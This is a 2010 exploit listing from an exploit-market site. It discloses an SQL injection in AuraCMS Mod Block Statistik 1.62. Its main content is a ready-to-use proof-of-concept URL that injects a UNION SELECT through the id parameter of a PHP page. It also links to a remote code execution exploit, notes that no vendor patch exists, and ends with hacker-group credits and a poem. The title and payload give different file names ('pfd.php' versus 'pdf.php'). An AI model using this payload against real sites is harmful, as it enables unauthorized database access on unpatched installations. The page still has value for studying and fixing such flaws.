[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AuraCMS (pfd.php) SQL Injection Vulnerability

Author
Don Tukulesto
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14948
Category
web applications
Date add
23-11-2010
Platform
php
=============================================
AuraCMS (pfd.php) SQL Injection Vulnerability
=============================================

Author      : Arianom (arianom@indonesiancoder.com)
Homepage    : http://indonesiancoder.com
Vendor      : http://www.auracms.org/
Software    : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
Version     : 1.62
Date        : November 22, 2010
-----------------------------------------------------------------------
 
 
 
I.  POC & Exploit
-----------------------------------------------------------------------
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7
 
II. Refrence
-----------------------------------------------------------------------
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit  : http://www.exploit-db.com/exploits/4933/
 
III. Vendor patch
-----------------------------------------------------------------------
Currently manufacturers do not provide patches or upgrades.
 
IV. Credits
-----------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~  Mboys ~ Contrex ~  n4KuLa_
k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader
 
V. Poem
-----------------------------------------------------------------------
Kami adalah manusia biasa yang gemar belajar.
Kami suka mempelajari hal apa saja, termasuk sesuatu yang menurut orang lain aneh atau asing bagi mereka.
Kami disini hanya ingin berbagi, bukan untuk bersaing.
 
Indonesian Coder Family



#  0day.today [2024-12-25]  #